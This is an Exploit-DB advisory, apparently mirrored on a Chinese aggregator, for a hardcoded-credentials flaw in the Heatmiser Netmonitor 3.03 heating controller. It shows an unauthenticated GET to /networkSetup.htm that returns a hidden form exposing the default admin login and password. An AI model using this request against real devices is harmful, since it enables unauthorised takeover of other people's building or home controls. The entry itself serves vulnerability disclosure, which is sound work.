Heatmiser Netmonitor 3.03 – Hardcoded Credentials

• Exploit Database
• 18 阅读

• 作者： Ismail Tasdelen
  日期： 2019-12-30
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47823/

• # Exploit Title: Heatmiser Netmonitor 3.03 - Hardcoded Credentials
  # Date: 2019-12-22 
  # Exploit Author: Ismail Tasdelen
  # Vendor Homepage: https://www.heatmiser.com/en/
  # Hardware Link: https://www.zoneregeling.nl/heatmiser/netmonitor-handleiding.pdf
  # Software: Netmonitor v3.03
  # Product Version: Netmonitor v3.03
  # CWE : CWE-798
  # Vulenrability: Use of Hard-coded Credentials
  # CVE: N/A
  
  # Decription :
  # Hard-coded Credentials security vulnerability of Netmonitor model v3.03
  # from Heatmiser manufacturer has been discovered. With this
  # vulnerability, the hidFrm form in the source code of the page
  # anonymously has access to hidden input codes. This information is
  # contained in the input field of the hidFrm form in the source code
  # lognm and logpd.
  
  
  HTTP GET Request : /networkSetup.htm HTTP/1.1
  
  <form name="hidFrm" method="post">
  <input type="hidden" name="lognm" value="admin">
  <input type="hidden" name="logpd" value="admin">
  <input type="hidden" name="ip" value="XXX.XXX.XXX.XXX">
  <input type="hidden" name="mask" value="XXX.XXX.XXX.XXX">
  <input type="hidden" name="gate" value="XXX.XXX.XXX.XXX">
  <input type="hidden" name="dns" value="XXX.XXX.XXX.XXX">
  <input type="hidden" name="timestr" value="04:27">
  <input type="hidden" name="datestr" value="23/12/2019">
  <input type="hidden" name="timeflag" ,="" value="0">
  <input type="hidden" name="gmtflag" ,="" value="1">
  </form>